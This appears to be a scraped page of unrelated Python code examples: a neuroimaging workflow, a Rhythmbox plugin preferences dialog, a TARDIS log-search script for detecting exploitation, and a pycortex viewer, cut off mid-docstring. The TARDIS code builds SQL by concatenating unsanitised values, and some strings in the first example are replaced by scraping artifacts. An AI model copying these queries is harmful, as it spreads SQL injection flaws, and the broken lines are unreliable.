    wf.connect(gpa_wf, 'outputspec.cluster_localmax_txt_zf',
               ds, '[email protected]')
    wf.connect(gpa_wf, 'outputspec.overlay_threshold_zf',
               ds, 'rendered')
    wf.connect(gpa_wf, 'outputspec.rendered_image_zf',
               ds, '[email protected]')
    wf.connect(gpa_wf, 'outputspec.cluster_threshold',
               ds,  '[email protected]')
    wf.connect(gpa_wf, 'outputspec.cluster_index',
               ds, '[email protected]')
    wf.connect(gpa_wf, 'outputspec.cluster_localmax_txt',
               ds, '[email protected]')
    wf.connect(gpa_wf, 'outputspec.overlay_threshold',
               ds, '[email protected]')
    wf.connect(gpa_wf, 'outputspec.rendered_image',
               ds, '[email protected]')
       
    ######################################

    # Run the actual group analysis workflow
    wf.run()

    print "\n\nWorkflow finished for model %s\n\n" % wf_name

Example 109

View license
    def _create_display_contents(self, plugin):
        print("DEBUG - create_display_contents")
        # create the ui
        self._first_run = True
        cl = CoverLocale()
        cl.switch_locale(cl.Locale.LOCALE_DOMAIN)
        builder = Gtk.Builder()
        builder.set_translation_domain(cl.Locale.LOCALE_DOMAIN)
        builder.add_from_file(rb.find_plugin_file(plugin,
                                                  'ui/coverart_browser_prefs.ui'))
        self.launchpad_button = builder.get_object('show_launchpad')
        self.launchpad_label = builder.get_object('launchpad_label')

        builder.connect_signals(self)

        # . TRANSLATORS: Do not translate this string.
        translators = _('translator-credits')

        if translators != "translator-credits":
            self.launchpad_label.set_text(translators)
        else:
            self.launchpad_button.set_visible(False)

        gs = GSetting()
        # bind the toggles to the settings
        toggle_statusbar = builder.get_object('custom_statusbar_checkbox')
        self.settings.bind(gs.PluginKey.CUSTOM_STATUSBAR,
                           toggle_statusbar, 'active', Gio.SettingsBindFlags.DEFAULT)

        toggle_text = builder.get_object('display_text_checkbox')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT, toggle_text, 'active',
                           Gio.SettingsBindFlags.DEFAULT)

        box_text = builder.get_object('display_text_box')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT, box_text, 'sensitive',
                           Gio.SettingsBindFlags.GET)

        self.display_text_pos = self.settings[gs.PluginKey.DISPLAY_TEXT_POS]
        self.display_text_under_radiobutton = builder.get_object('display_text_under_radiobutton')
        self.display_text_within_radiobutton = builder.get_object('display_text_within_radiobutton')

        if self.display_text_pos:
            self.display_text_under_radiobutton.set_active(True)
        else:
            self.display_text_within_radiobutton.set_active(True)

        random_scale = builder.get_object('random_adjustment')
        self.settings.bind(gs.PluginKey.RANDOM, random_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        toggle_text_ellipsize = builder.get_object(
            'display_text_ellipsize_checkbox')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT_ELLIPSIZE,
                           toggle_text_ellipsize, 'active', Gio.SettingsBindFlags.DEFAULT)

        box_text_ellipsize_length = builder.get_object(
            'display_text_ellipsize_length_box')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT_ELLIPSIZE,
                           box_text_ellipsize_length, 'sensitive', Gio.SettingsBindFlags.GET)

        spinner_text_ellipsize_length = builder.get_object(
            'display_text_ellipsize_length_spin')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT_ELLIPSIZE_LENGTH,
                           spinner_text_ellipsize_length, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        spinner_font_size = builder.get_object(
            'display_font_spin')
        self.settings.bind(gs.PluginKey.DISPLAY_FONT_SIZE,
                           spinner_font_size, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        cover_size_scale = builder.get_object('cover_size_adjustment')

        #self.settings.bind(gs.PluginKey.COVER_SIZE, cover_size_scale, 'value',
        #                   Gio.SettingsBindFlags.DEFAULT)
        self._cover_size = self.settings[gs.PluginKey.COVER_SIZE]
        cover_size_scale.set_value(self._cover_size)
        cover_size_scale.connect('value-changed', self.on_cover_size_scale_changed)

        add_shadow = builder.get_object('add_shadow_checkbox')
        self.settings.bind(gs.PluginKey.ADD_SHADOW, add_shadow, 'active',
                           Gio.SettingsBindFlags.DEFAULT)

        rated_box = builder.get_object('rated_box')
        self.stars = ReactiveStar(size=StarSize.BIG)

        self.stars.connect('changed', self.rating_changed_callback)

        align = Gtk.Alignment.new(0.5, 0, 0, 0.1)
        align.add(self.stars)
        rated_box.add(align)

        self.stars.set_rating(self.settings[gs.PluginKey.RATING])

        autostart = builder.get_object('autostart_checkbox')
        self.settings.bind(gs.PluginKey.AUTOSTART,
                           autostart, 'active', Gio.SettingsBindFlags.DEFAULT)

        toolbar_pos_combo = builder.get_object('show_in_combobox')
        renderer = Gtk.CellRendererText()
        toolbar_pos_combo.pack_start(renderer, True)
        toolbar_pos_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.TOOLBAR_POS, toolbar_pos_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        light_source_combo = builder.get_object('light_source_combobox')
        renderer = Gtk.CellRendererText()
        light_source_combo.pack_start(renderer, True)
        light_source_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.SHADOW_IMAGE, light_source_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        combo_liststore = builder.get_object('combo_liststore')

        from coverart_utils import Theme

        for theme in Theme(self).themes:
            combo_liststore.append([theme, theme])

        theme_combo = builder.get_object('theme_combobox')
        renderer = Gtk.CellRendererText()
        theme_combo.pack_start(renderer, True)
        theme_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.THEME, theme_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        button_relief = builder.get_object('button_relief_checkbox')
        self.settings.bind(gs.PluginKey.BUTTON_RELIEF, button_relief, 'active',
                           Gio.SettingsBindFlags.DEFAULT)

        # create user data files
        cachedir = RB.user_cache_dir() + "/coverart_browser/usericons"
        if not os.path.exists(cachedir):
            os.makedirs(cachedir)

        popup = cachedir + "/popups.xml"

        temp = RB.find_user_data_file('plugins/coverart_browser/img/usericons/popups.xml')

        # lets see if there is a legacy file - if necessary copy it to the cache dir
        if os.path.isfile(temp) and not os.path.isfile(popup):
            shutil.copyfile(temp, popup)

        if not os.path.isfile(popup):
            template = rb.find_plugin_file(plugin, 'template/popups.xml')
            folder = os.path.split(popup)[0]
            if not os.path.exists(folder):
                os.makedirs(folder)
            shutil.copyfile(template, popup)

        # now prepare the genre tab
        from coverart_utils import GenreConfiguredSpriteSheet
        from coverart_utils import get_stock_size

        self._sheet = GenreConfiguredSpriteSheet(plugin, "genre", get_stock_size())

        self.alt_liststore = builder.get_object('alt_liststore')
        self.alt_user_liststore = builder.get_object('alt_user_liststore')
        self._iters = {}
        for key in list(self._sheet.keys()):
            store_iter = self.alt_liststore.append([key, self._sheet[key]])
            self._iters[(key, self.GENRE_POPUP)] = store_iter

        for key, value in self._sheet.genre_alternate.items():
            if key.genre_type == GenreConfiguredSpriteSheet.GENRE_USER:
                store_iter = self.alt_user_liststore.append([key.name,
                                                             self._sheet[self._sheet.genre_alternate[key]],
                                                             self._sheet.genre_alternate[key]])
                self._iters[(key.name, self.GENRE_LIST)] = store_iter

        self.amend_mode = False
        self.blank_iter = None
        self.genre_combobox = builder.get_object('genre_combobox')
        self.genre_entry = builder.get_object('genre_entry')
        self.genre_view = builder.get_object('genre_view')
        self.save_button = builder.get_object('save_button')
        self.filechooserdialog = builder.get_object('filechooserdialog')
        last_genre_folder = self.settings[gs.PluginKey.LAST_GENRE_FOLDER]
        if last_genre_folder != "":
            self.filechooserdialog.set_current_folder(last_genre_folder)

        padding_scale = builder.get_object('padding_adjustment')
        self.settings.bind(gs.PluginKey.ICON_PADDING, padding_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        spacing_scale = builder.get_object('spacing_adjustment')
        self.settings.bind(gs.PluginKey.ICON_SPACING, spacing_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        icon_automatic = builder.get_object('icon_automatic_checkbox')
        self.settings.bind(gs.PluginKey.ICON_AUTOMATIC,
                           icon_automatic, 'active', Gio.SettingsBindFlags.DEFAULT)

        #flow tab
        flow_combo = builder.get_object('flow_combobox')
        renderer = Gtk.CellRendererText()
        flow_combo.pack_start(renderer, True)
        flow_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.FLOW_APPEARANCE, flow_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        flow_hide = builder.get_object('hide_caption_checkbox')
        self.settings.bind(gs.PluginKey.FLOW_HIDE_CAPTION,
                           flow_hide, 'active', Gio.SettingsBindFlags.DEFAULT)

        flow_scale = builder.get_object('cover_scale_adjustment')
        self.settings.bind(gs.PluginKey.FLOW_SCALE, flow_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        flow_width = builder.get_object('cover_width_adjustment')
        self.settings.bind(gs.PluginKey.FLOW_WIDTH, flow_width, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        flow_max = builder.get_object('flow_max_adjustment')
        self.settings.bind(gs.PluginKey.FLOW_MAX, flow_max, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        flow_automatic = builder.get_object('automatic_checkbox')
        self.settings.bind(gs.PluginKey.FLOW_AUTOMATIC,
                           flow_automatic, 'active', Gio.SettingsBindFlags.DEFAULT)

        self.background_colour = self.settings[gs.PluginKey.FLOW_BACKGROUND_COLOUR]
        self.white_radiobutton = builder.get_object('white_radiobutton')
        self.black_radiobutton = builder.get_object('black_radiobutton')

        if self.background_colour == 'W':
            self.white_radiobutton.set_active(True)
        else:
            self.black_radiobutton.set_active(True)

        self.text_alignment = self.settings[gs.PluginKey.TEXT_ALIGNMENT]
        self.text_alignment_left_radiobutton = builder.get_object('left_alignment_radiobutton')
        self.text_alignment_centre_radiobutton = builder.get_object('centre_alignment_radiobutton')
        self.text_alignment_right_radiobutton = builder.get_object('right_alignment_radiobutton')

        if self.text_alignment == 0:
            self.text_alignment_left_radiobutton.set_active(True)
        elif self.text_alignment == 1:
            self.text_alignment_centre_radiobutton.set_active(True)
        else:
            self.text_alignment_right_radiobutton.set_active(True)

        # return the dialog
        self._first_run = False
        print("end create dialog contents")
        return builder.get_object('main_notebook')

Example 110

Project: TARDIS
Source File: TARDIS.py
View license
def main(vulnerability,vulnObject,sourceIP,sourceHost):
	#Create results and working directories
	if not os.path.exists('Results'):
		os.makedirs('Results')
	if not os.path.exists('Working'):
		os.makedirs('Working')
	
	#Make sure the vulnerability is valid
	if vulnerability != "":
		vulnCheck=0
		resultCount=0
		logsource=''
		print("Searching for evidence of \"" + vulnerability + "\"")
		print("  Host: " + sourceIP)
		
		try:
			configFile = 'config.xml'
			tree = ET.parse(configFile)
			root = tree.getroot()
		except:
			sys.exit("Not a valid config XML file")
		for settings in root.findall("./log_source"):
			logsource=settings.text
		cnx = getDBConnector()
		
		
		#check if vulnerability/asset combo exists in assetVulnerability Table
		cursor = cnx.cursor()
		query = ("SELECT count(*) as count from assetVulnerabilities where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "'")
		
		cursor.execute(query)
		for row in cursor:
			vulnCheck=row[0]
		cursor.close()
		
		if vulnCheck==0:
			#No combination exists, write data to DB
			
			cursor = cnx.cursor()
			add_vulnInstance = ("INSERT INTO assetVulnerabilities "
               "(victim_ip, threat_id, active) "
               "VALUES (%s, %s, %s)")
			vulnData = (ip2long(sourceIP), vulnerability, '1')
			
			# Insert new entry
			cursor.execute(add_vulnInstance , vulnData )
			
			cnx.commit()
			cursor.close()
			cnx.close()
		searchStringResults= findStixObservables.run(vulnerability)
		isExploitFound=False
		searchStringCount=0
		operator=searchStringResults[0]
		numResults=0
		if(searchStringResults[1]=="No search file found"):
			searchResults="0"
			print("  No search file found\n")
		elif(searchStringResults[1]=="No supported observables found"):
			searchResults="0"
			print("  No supported observables found\n")
		else:
			#run  search...
			#search should return number of results
			#Insert source host from arguments
			for entry in searchStringResults:
				if logsource=="splunk":
					if (searchStringCount == 1):
						searchString=entry + " AND (host=\"" + sourceHost + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\")  | fields host, c_ip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\" | rename c_ip as clientip"
						numResults=splunk.searchVulnerability(searchString,vulnerability,sourceIP,sourceHost)
						if (numResults != "0"):
							data = json.load(numResults)
					
					if (operator=="AND"):
						if (searchStringCount > 1):
							resultCount=0
							for result in data["results"]:
								startTime =  dateutil.parser.parse(data["results"][resultCount]["_time"]) + datetime.timedelta(days =- 300)
								endTime =  dateutil.parser.parse(data["results"][resultCount]["_time"]) + datetime.timedelta(days = 300)
								searchString=entry + " AND (host=\"" + sourceHost + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\") | fields host, clientip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\""
								newResults=splunk.searchVulnerabilityTimeRange(searchString,vulnerability,sourceIP,sourceHost,startTime.isoformat(),endTime.isoformat())
								if (newResults != "0"):
									#This is the result from search 1
									newData = json.load(newResults)
									newResultCount=0
									for result in newData["results"]:
										try:
											clientip=newData["results"][newResultCount]["clientip"]
										except:
											clientip="0"
										isExploitFound=True
										#These are the results from any further results proving the AND condition
										cnx = getDBConnector()
										cursor = cnx.cursor()
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(clientip), newData["results"][newResultCount]["_time"], newData["results"][newResultCount]["Raw Log"], vulnerability)
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											cnx.commit()
											cursor.close()
										cnx.close()
										newResultCount=newResultCount+1
								else:
									newResultCount=0
							if (isExploitFound==True):
								try:
									clientip=data["results"][resultCount]["clientip"]
								except:
									clientip="0"
								cnx = getDBConnector()
								cursor = cnx.cursor()
								query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
								cursor.execute(query)
								for row in cursor:
									logCheck=row[0]
								cursor.close()
								if logCheck==0:
									#Write data to DB
									cursor = cnx.cursor()
									add_logInstance = ("INSERT INTO attackInventory "
														"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
														"VALUES (%s, %s, %s, %s, %s)")
									
									logData = (ip2long(sourceIP), ip2long(clientip), data["results"][resultCount]["_time"], data["results"][resultCount]["Raw Log"], vulnerability)
									# Insert new entry
									cursor.execute(add_logInstance , logData )
									cnx.commit()
									cursor.close()
								cnx.close()
								resultCount=newResultCount+1
							else:
								resultCount=newResultCount
					elif (operator=="OR"):
						if (searchStringCount > 0):
							#only keep searching if there are more IOCS to look at...
							if len(searchStringResults)>2:
								searchString=entry + " AND (host=\"" + sourceHost + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\")  | fields host, clientip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\""
								numResults=splunk.searchVulnerability(searchString,vulnerability,sourceIP,sourceHost)
								if (numResults != "0"):
									data = json.load(numResults)
									resultCount=0
									for result in data["results"]:
										isExploitFound=True
										cnx = getDBConnector()
										cursor = cnx.cursor()
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											logData = (ip2long(sourceIP), ip2long(data["results"][resultCount]["clientip"]), data["results"][resultCount]["_time"], data["results"][resultCount]["Raw Log"], vulnerability)
											
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											
											cnx.commit()
											cursor.close()
										cnx.close()
										resultCount=resultCount+1
							elif len(searchStringResults)==2:
								searchString=entry + " AND (host=\"" + sourceHost + "\" OR host=\"" + sourceIP + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\")  | fields host, clientip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\""
								numResults=splunk.searchVulnerability(searchString,vulnerability,sourceIP,sourceHost)
								if (numResults != "0"):
									data = json.load(numResults)
									resultCount=0
									for result in data["results"]:
										isExploitFound=True
										cnx = getDBConnector()
										cursor = cnx.cursor()
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(data["results"][resultCount]["clientip"]), data["results"][resultCount]["_time"], data["results"][resultCount]["Raw Log"], vulnerability)
											
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											
											cnx.commit()
											cursor.close()
										cnx.close()
										resultCount=resultCount+1
					searchStringCount=searchStringCount+1
				elif logsource=="elastic_search":
					numResults=0
					startTime="-90d"
					endTime="now"
					#Insert source host from arguments
					entry = re.sub('\<source_host\>', sourceHost, entry)
					#Insert source IP from arguments
					entry = re.sub('\<source_ip\>', sourceIP, entry)
					if (searchStringCount == 1):
						#Insert startTime
						entry = re.sub('\<startTime\>', startTime, entry)
						#Insert endTime
						entry = re.sub('\<endTime\>', endTime, entry)
						if sourceIP == '*':
							entry = re.sub('\<min_count\>', '1', entry)
						else:
							entry = re.sub('\<min_count\>', '2', entry)
						#print entry
						searchResults = ElasticSearchQuery.searchVulnerability(entry,vulnerability,sourceIP,sourceHost)
						#print searchResults
						numResults = getElasticSearchResults(searchResults)
						#print numResults
					if (operator=="AND"):
						if (searchStringCount > 1):
							resultCount=0
							for hit in searchResults['hits']['hits']:
								startTime =  dateutil.parser.parse(hit["_source"]["@timestamp"]) + datetime.timedelta(days =- 1)
								
								endTime =  dateutil.parser.parse(hit["_source"]["@timestamp"]) + datetime.timedelta(days = 1)
								#Insert start time
								entry = re.sub('\<startTime\>', str(startTime.isoformat()), entry)
								#Insert end time
								entry = re.sub('\<endTime\>', str(endTime.isoformat()), entry)
								newSearchResults = ElasticSearchQuery.searchVulnerability(entry,vulnerability,sourceIP,sourceHost)
								newResults = getElasticSearchResults(newSearchResults)
								if (newResults != "0"):
									#This is the result from search 1
									newResultCount=0
									isExploitFound=True
									for newhit in newSearchResults['hits']['hits']:
										try:
											attackerIP=newhit["_source"]["evt_srcip"]
										except:
											attackerIP="0.0.0.0"
										#These are the results from any further results proving the AND condition
										cnx = getDBConnector()
										cursor = cnx.cursor()
										#Check original log hit
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_log = '" + newhit["_source"]["message"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(attackerIP),hit["_source"]["@timestamp"], hit["_source"]["message"], vulnerability)
											# Insert new entry
											cursor.execute(add_logInstance , logData )
										cursor = cnx.cursor()
										#check new log hit
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_log = '" + newhit["_source"]["message"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(attackerIP),newhit["_source"]["@timestamp"], newhit["_source"]["message"], vulnerability)
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											
											cnx.commit()
											cursor.close()
										cnx.close()
										newResultCount=newResultCount+1
								else:
									newResultCount=0
								resultCount=newResultCount+1
								
								
								
					elif (operator=="OR"):
						if (searchStringCount == 1):
							if (int(numResults) > 0):
								resultCount = int(numResults)
								writeElasticSearchResults(searchResults,vulnObject,sourceIP,vulnerability)
								isExploitFound=True
						if (searchStringCount > 1):
							#Insert startTime
							entry = re.sub('\<startTime\>', startTime, entry)
							#Insert endTime
							entry = re.sub('\<endTime\>', endTime, entry)
							if sourceIP == '*':
								entry = re.sub('\<min_count\>', '1', entry)
							else:
								entry = re.sub('\<min_count\>', '2', entry)
							#only keep searching if there are more IOCS to look at...
							if len(searchStringResults)>1:
								searchResults = ElasticSearchQuery.searchVulnerability(entry,vulnerability,sourceIP,sourceHost)
								numResults = getElasticSearchResults(searchResults)
								if int(numResults) > 0:
									writeElasticSearchResults(searchResults,vulnObject,sourceIP,vulnerability)
								resultCount = resultCount + int(numResults)
					searchStringCount=searchStringCount+1
			if (isExploitFound==True):
				print("  Found " + str(resultCount) + " instances of exploitation!")
				print("  Generating attack logs") 
				#Parse through data list to get elastic timestamp for audit log times...
			else:
				print("  No instances of exploitation found.\n")
	else:
		resultCount=0
		print("Invalid vulnerability ID")
	return(resultCount)

Example 111

Project: pycortex
Source File: view.py
View license
def show(data, types=("inflated",), recache=False, cmap='RdBu_r', layout=None,
         autoclose=True, open_browser=True, port=None, pickerfun=None,
         disp_layers=['rois'], extra_disp=None, template='mixer.html', **kwargs):
    """Display a dynamic viewer using the given dataset. See cortex.webgl.make_static for help.
    """
    data = dataset.normalize(data)
    if not isinstance(data, dataset.Dataset):
        data = dataset.Dataset(data=data)

    if os.path.exists(template):
        ## Load locally
        templatedir, templatefile = os.path.split(os.path.abspath(template))
        rootdirs = [templatedir, serve.cwd]
    else:
        ## Load system templates
        templatefile = template
        rootdirs = [serve.cwd]
 
    html = FallbackLoader(rootdirs).load(templatefile)
    db.auxfile = data

    #Extract the list of stimuli, for special-casing
    stims = dict()
    for name, view in data:
        if 'stim' in view.attrs and os.path.exists(view.attrs['stim']):
            sname = os.path.split(view.attrs['stim'])[1]
            stims[sname] = view.attrs['stim']

    package = Package(data)
    metadata = json.dumps(package.metadata())
    images = package.images
    subjects = list(package.subjects)

    kwargs.update(dict(method='mg2', level=9, recache=recache))
    ctms = dict((subj, utils.get_ctmpack(subj,
                                         types,
                                         disp_layers=disp_layers,
                                         extra_disp=extra_disp,
                                         **kwargs))
                for subj in subjects)

    subjectjs = json.dumps(dict((subj, "/ctm/%s/"%subj) for subj in subjects))
    db.auxfile = None

    if layout is None:
        layout = [None, (1,1), (2,1), (3,1), (2,2), (3,2), (3,2), (3,3), (3,3), (3,3)][len(subjects)]

    linear = lambda x, y, m: (1.-m)*x + m*y
    mixes = dict(
        linear=linear,
        smoothstep=(lambda x, y, m: linear(x,y,3*m**2 - 2*m**3)),
        smootherstep=(lambda x, y, m: linear(x, y, 6*m**5 - 15*m**4 + 10*m**3))
    )

    post_name = Queue.Queue()

    if pickerfun is None:
        pickerfun = lambda a,b: None

    class CTMHandler(web.RequestHandler):
        def get(self, path):
            subj, path = path.split('/')
            if path == '':
                self.set_header("Content-Type", "application/json")
                self.write(open(ctms[subj]).read())
            else:
                fpath = os.path.split(ctms[subj])[0]
                mtype = mimetypes.guess_type(os.path.join(fpath, path))[0]
                if mtype is None:
                    mtype = "application/octet-stream"
                self.set_header("Content-Type", mtype)
                self.write(open(os.path.join(fpath, path)).read())

    class DataHandler(web.RequestHandler):
        def get(self, path):
            path = path.strip("/")
            try:
                dataname, frame = path.split('/')
            except ValueError:
                dataname = path
                frame = 0

            if dataname in images:
                self.set_header("Content-Type", "image/png")
                self.write(images[dataname][int(frame)])
            else:
                self.set_status(404)
                self.write_error(404)

    class StimHandler(web.StaticFileHandler):
        def initialize(self):
            pass

        def get(self, path):
            if path not in stims:
                self.set_status(404)
                self.write_error(404)
            else:
                self.root, fname = os.path.split(stims[path])
                super(StimHandler, self).get(fname)

    class StaticHandler(web.StaticFileHandler):
        def initialize(self):
            self.root = ''

    class MixerHandler(web.RequestHandler):
        def get(self):
            self.set_header("Content-Type", "text/html")

            # Add optional extra_layers to disp_layers if provided
            if not extra_disp is None:
                svgf,dl = extra_disp
                if not isinstance(dl,(list,tuple)):
                    dl = [dl]
            else:
                dl = []
            print(disp_layers+dl)
            generated = html.generate(data=metadata,
                                      colormaps=colormaps,
                                      default_cmap=cmap,
                                      python_interface=True,
                                      layout=layout,
                                      subjects=subjectjs,
                                      disp_layers=disp_layers+dl,
                                      disp_defaults=_make_disp_defaults(disp_layers+dl),
                                      **viewopts)
            self.write(generated)

        def post(self):
            data = self.get_argument("svg", default=None)
            png = self.get_argument("png", default=None)
            with open(post_name.get(), "wb") as svgfile:
                if png is not None:
                    data = png[22:].strip()
                    try:
                        data = binascii.a2b_base64(data)
                    except:
                        print("Error writing image!")
                        data = png
                svgfile.write(data)

    class JSMixer(serve.JSProxy):
        def _set_view(self,**kwargs):
            """Low-level command: sets view parameters in the current viewer

            Sets each the state of each keyword argument provided. View parameters
            that can be set include:

            altitude, azimuth, target, mix, radius, visL, visR, pivot,
            (L/R hemisphere visibility), alpha (background alpha),
            rotationL, rotationR (L/R hemisphere rotation, [x,y,z])

            Notes
            -----
            Args must be lists instead of scalars, e.g. `azimuth`=[90]
            This could be changed, but this is a hidden function, called by
            higher-level functions that load .json files, which have the
            parameters in lists by default. So it's annoying either way.
            """
            props = ['altitude','azimuth','target','mix','radius','pivot',
                'visL','visR','alpha','rotationR','rotationL','projection',
                'volume_vis','frame','slices']
            # Set mix first, as it interacts with other arguments
            if 'mix' in kwargs:
                mix = kwargs.pop('mix')
                self.setState('mix',mix)
            for k in kwargs.keys():
                if not k in props:
                    if k=='time':
                        continue
                    print('Unknown parameter %s!'%k)
                    continue
                self.setState(k,kwargs[k][0])

        def _capture_view(self,time=None):
            """Low-level command: returns a dict of current view parameters

            Retrieves the following view parameters from current viewer:

            altitude, azimuth, target, mix, radius, visL, visR, alpha,
            rotationR, rotationL, projection, pivot

            `time` appends a 'time' key into the view (for use in animations)
            """
            props = ['altitude','azimuth','target','mix','radius','pivot',
                'visL','visR','alpha','rotationR','rotationL','projection',
                'volume_vis','frame','slices']
            view = {}
            for p in props:
                view[p] = self.getState(p)[0]
            if not time is None:
                view['time'] = time
            return view

        def save_view(self,subject,name,is_overwrite=False):
            """Saves current view parameters to pycortex database

            Parameters
            ----------
            subject : string
                pycortex subject id
            name : string
                name for view to store
            is_overwrite: bool
                whether to overwrite an extant view (default : False)

            Notes
            -----
            Equivalent to call to cortex.db.save_view(subject,vw,name)
            For a list of the view parameters saved, see viewer._capture_view

            See Also
            --------
            viewer methods get_view, _set_view, _capture_view
            """
            db.save_view(self,subject,name,is_overwrite)

        def get_view(self,subject,name):
            """Get saved view from pycortex database.

            Retrieves named view from pycortex database and sets current
            viewer parameters to retrieved values.

            Parameters
            ----------
            subject : string
                pycortex subject ID
            name : string
                name of saved view to re-load

            Notes
            -----
            Equivalent to call to cortex.db.get_view(subject,vw,name)
            For a list of the view parameters set, see viewer._capture_view

            See Also
            --------
            viewer methods save_view, _set_view, _capture_view
            """
            view = db.get_view(self,subject,name)

        def addData(self, **kwargs):
            Proxy = serve.JSProxy(self.send, "window.viewers.addData")
            new_meta, new_ims = _convert_dataset(Dataset(**kwargs), path='/data/', fmt='%s_%d.png')
            metadata.update(new_meta)
            images.update(new_ims)
            return Proxy(metadata)

        # Would like this to be here instead of in setState, but did
        # not know how to make that work...
        #def setData(self,name):
        #    Proxy = serve.JSProxy(self.send, "window.viewers.setData")
        #    return Proxy(name)

        def saveIMG(self, filename,size=(None, None)):
            """Saves currently displayed view to a .png image file

            Parameters
            ----------
            filename : string
                duh.
            size : tuple (x,y)
                size (in pixels) of image to save.
            """
            post_name.put(filename)
            Proxy = serve.JSProxy(self.send, "window.viewers.saveIMG")
            return Proxy(size[0], size[1], template)

        def makeMovie(self, animation, filename="brainmovie%07d.png", offset=0,
                      fps=30, size=(1920, 1080), interpolation="linear"):
            """Renders movie frames for animation of mesh movement

            Makes an animation (for example, a transition between inflated and
            flattened brain or a rotating brain) of a cortical surface. Takes a
            list of dictionaries (`animation`) as input, and uses the values in
            the dictionaries as keyframes for the animation.

            Mesh display parameters that can be animated include 'elevation',
            'azimuth','mix','radius','target' (more?)


            Parameters
            ----------
            animation : list of dicts
                Each dict should have keys `idx`, `state`, and `value`.
                `idx` is the time (in seconds) at which you want to set `state` to `value`
                `state` is the parameter to animate (e.g. 'altitude','azimuth')
                `value` is the value to set for `state`
            filename : string path name
                Must contain '%d' (or some variant thereof) to account for frame
                number, e.g. '/some/directory/brainmovie%07d.png'
            offset : int
                Frame number for first frame rendered. Useful for concatenating
                animations.
            fps : int
                Frame rate of resultant movie
            size : tuple (x,y)
